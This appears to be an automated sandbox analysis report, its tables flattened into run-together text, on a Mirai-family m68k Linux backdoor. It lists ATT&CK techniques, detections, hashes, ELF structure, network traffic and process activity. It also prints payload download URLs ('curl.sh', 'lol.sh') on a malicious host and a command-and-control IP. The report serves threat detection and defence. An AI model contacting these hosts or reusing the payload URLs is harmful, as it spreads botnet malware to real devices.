                Gather Victim Identity Information1
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Scripting
                Path Interception1
                File Deletion
                OS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                m68k.nn.elf34%ReversingLabsLinux.Backdoor.Mirai
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://94.156.227.233/curl.shm68k.nn.elffalse
                  high
                  http://94.156.227.233/lol.shm68k.nn.elffalse
                    high
                    http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sm68k.nn.elffalse
                      high
                      http://94.156.227.233/m68k.nn.elffalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        154.216.19.139
                        unknownSeychelles
                        135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                        109.202.202.202
                        unknownSwitzerland
                        13030INIT7CHfalse
                        91.189.91.43
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        91.189.91.42
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        154.216.19.139m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                      m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                          na.elfGet hashmaliciousUnknownBrowse
                                            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                            91.189.91.43Mozi.m.elfGet hashmaliciousMiraiBrowse
                                              boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                  boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                      hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                        hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                          hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                            biosetGet hashmaliciousUnknownBrowse
                                                              co.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                91.189.91.42Mozi.m.elfGet hashmaliciousMiraiBrowse
                                                                  boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                    boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                      boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                        boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                          hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                            hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                              hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                biosetGet hashmaliciousUnknownBrowse
                                                                                  co.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CANONICAL-ASGBMozi.m.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    biosetGet hashmaliciousUnknownBrowse
                                                                                    • 91.189.91.42
                                                                                    co.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    CANONICAL-ASGBMozi.m.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    biosetGet hashmaliciousUnknownBrowse
                                                                                    • 91.189.91.42
                                                                                    co.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    SKHT-ASShenzhenKatherineHengTechnologyInformationCosora.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 45.207.215.90
                                                                                    zmap.ppc.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.216.18.131
                                                                                    zmap.arm7.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.216.18.131
                                                                                    zmap.arm.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.216.18.131
                                                                                    armv7l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 156.241.11.68
                                                                                    zmap.x86.elfGet hashmaliciousOkiruBrowse
                                                                                    • 154.216.18.131
                                                                                    armv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 156.230.19.162
                                                                                    zmap.m68k.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.216.18.131
                                                                                    zmap.mpsl.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.216.18.131
                                                                                    zmap.sh4.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.216.18.131
                                                                                    INIT7CHMozi.m.elfGet hashmaliciousMiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    boatnet.mips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    boatnet.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    boatnet.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    hidakibest.mips.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    hidakibest.arm5.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    hidakibest.mpsl.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    biosetGet hashmaliciousUnknownBrowse
                                                                                    • 109.202.202.202
                                                                                    co.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    No context
                                                                                    No context
                                                                                    Process:/tmp/m68k.nn.elf
                                                                                    File Type:ASCII text
                                                                                    Category:dropped
                                                                                    Size (bytes):53
                                                                                    Entropy (8bit):3.871459242626451
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                                    MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                                    SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                                    SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                                    SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:gorilla botnet is on the device ur not a cat go away.
                                                                                    Process:/usr/libexec/gsd-housekeeping
                                                                                    File Type:very short file (no magic)
                                                                                    Category:dropped
                                                                                    Size (bytes):1
                                                                                    Entropy (8bit):0.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3::
                                                                                    MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                    SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                    SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                    SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:.
                                                                                    Process:/tmp/m68k.nn.elf
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):17
                                                                                    Entropy (8bit):3.6168746059562227
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:TgSC/ANln:TglOn
                                                                                    MD5:CF5BFD6A623ECC046218AA0EBA4D8FE7
                                                                                    SHA1:E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88
                                                                                    SHA-256:C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560
                                                                                    SHA-512:F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:/tmp/m68k.nn.elf.
                                                                                    File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                                                    Entropy (8bit):6.412466109748344
                                                                                    TrID:
                                                                                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                    File name:m68k.nn.elf
                                                                                    File size:111'368 bytes
                                                                                    MD5:4ec8fc9e24ee7cb0b0334a961cce6e47
                                                                                    SHA1:d3f26710fa2c52ea680c36ab89cab49e1ce00d3f
                                                                                    SHA256:69b01a52a12676f94ce3665bdfec5416f729f7d27a0670779e2922c5ed38e884
                                                                                    SHA512:3d24cf960ec8096aca828237887df64380aa670b758707ac1ded849e7c22e56af974d5a3079a84e7ed91e7c1c27721cb25e3f4e2804ae2abb4b42870ced1da3c
                                                                                    SSDEEP:3072:zD2eCNTgT3Q7LuXgSHF1sYidGPlyYsT/g7EsubzLhL:zdO+kKyY0I7/uFL
                                                                                    TLSH:D0B34BCBB000CDBDFF1AD6BB44270A19B535A3A05F521F37A297FD679D721980826E81
                                                                                    File Content Preview:.ELF.......................D...4...x.....4. ...(.......................j...j...... ........p...p...p......(....... .dt.Q............................NV..a....da...~TN^NuNV..J9...8f>"y.... QJ.g.X.#.....N."y.... QJ.f.A.....J.g.Hy...lN.X........8N^NuNV..N^NuN

                                                                                    ELF header

                                                                                    Class:ELF32
                                                                                    Data:2's complement, big endian
                                                                                    Version:1 (current)
                                                                                    Machine:MC68000
                                                                                    Version Number:0x1
                                                                                    Type:EXEC (Executable file)
                                                                                    OS/ABI:UNIX - System V
                                                                                    ABI Version:0
                                                                                    Entry Point Address:0x80000144
                                                                                    Flags:0x0
                                                                                    ELF Header Size:52
                                                                                    Program Header Offset:52
                                                                                    Program Header Size:32
                                                                                    Number of Program Headers:3
                                                                                    Section Header Offset:110968
                                                                                    Section Header Size:40
                                                                                    Number of Section Headers:10
                                                                                    Header String Table Index:9
                                                                                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                    NULL0x00x00x00x00x0000
                                                                                    .initPROGBITS0x800000940x940x140x00x6AX002
                                                                                    .textPROGBITS0x800000a80xa80x17e7e0x00x6AX004
                                                                                    .finiPROGBITS0x80017f260x17f260xe0x00x6AX002
                                                                                    .rodataPROGBITS0x80017f340x17f340x2c360x00x2A002
                                                                                    .ctorsPROGBITS0x8001cb700x1ab700x80x00x3WA004
                                                                                    .dtorsPROGBITS0x8001cb780x1ab780x80x00x3WA004
                                                                                    .dataPROGBITS0x8001cb840x1ab840x5b40x00x3WA004
                                                                                    .bssNOBITS0x8001d1380x1b1380x223c0x00x3WA004
                                                                                    .shstrtabSTRTAB0x00x1b1380x3e0x00x0001
                                                                                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                    LOAD0x00x800000000x800000000x1ab6a0x1ab6a6.42530x5R E0x2000.init .text .fini .rodata
                                                                                    LOAD0x1ab700x8001cb700x8001cb700x5c80x28045.02010x6RW 0x2000.ctors .dtors .data .bss
                                                                                    GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Dec 5, 2024 06:42:41.038821936 CET38960199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.159405947 CET19938960154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:41.159480095 CET38960199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.165231943 CET38960199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.165935993 CET38960199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.167691946 CET38962199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.284996033 CET19938960154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:41.287415028 CET19938962154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:41.287482977 CET38962199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.288203955 CET38962199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.288590908 CET38962199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.292210102 CET38964199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.330146074 CET19938960154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:41.408112049 CET19938962154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:41.411969900 CET19938964154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:41.412024021 CET38964199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.450165987 CET19938962154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:41.466170073 CET38964199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:41.586038113 CET19938964154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:41.586087942 CET38964199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:43.402756929 CET19938960154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:43.402844906 CET38960199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:43.512321949 CET19938962154.216.19.139192.168.2.23
                                                                                    Dec 5, 2024 06:42:43.512392044 CET38962199192.168.2.23154.216.19.139
                                                                                    Dec 5, 2024 06:42:43.649863958 CET43928443192.168.2.2391.189.91.42
                                                                                    Dec 5, 2024 06:42:49.281023979 CET42836443192.168.2.2391.189.91.43
                                                                                    Dec 5, 2024 06:42:50.816832066 CET4251680192.168.2.23109.202.202.202
                                                                                    Dec 5, 2024 06:43:03.615124941 CET43928443192.168.2.2391.189.91.42
                                                                                    Dec 5, 2024 06:43:15.901437044 CET42836443192.168.2.2391.189.91.43
                                                                                    Dec 5, 2024 06:43:22.044507980 CET4251680192.168.2.23109.202.202.202
                                                                                    Dec 5, 2024 06:43:44.569330931 CET43928443192.168.2.2391.189.91.42

                                                                                    System Behavior

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/tmp/m68k.nn.elf
                                                                                    Arguments:/tmp/m68k.nn.elf
                                                                                    File size:4463432 bytes
                                                                                    MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/tmp/m68k.nn.elf
                                                                                    Arguments:-
                                                                                    File size:4463432 bytes
                                                                                    MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/libexec/gnome-session-binary
                                                                                    Arguments:-
                                                                                    File size:334664 bytes
                                                                                    MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/bin/sh
                                                                                    Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
                                                                                    File size:129816 bytes
                                                                                    MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/libexec/gsd-housekeeping
                                                                                    Arguments:/usr/libexec/gsd-housekeeping
                                                                                    File size:51840 bytes
                                                                                    MD5 hash:b55f3394a84976ddb92a2915e5d76914

                                                                                    Start time (UTC):05:42:40
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):05:42:41
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                                    Start time (UTC):05:42:41
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/lib/udisks2/udisksd
                                                                                    Arguments:-
                                                                                    File size:483056 bytes
                                                                                    MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                                    Start time (UTC):05:42:41
                                                                                    Start date (UTC):05/12/2024
                                                                                    Path:/usr/sbin/dumpe2fs
                                                                                    Arguments:dumpe2fs -h /dev/dm-0
                                                                                    File size:31112 bytes
                                                                                    MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4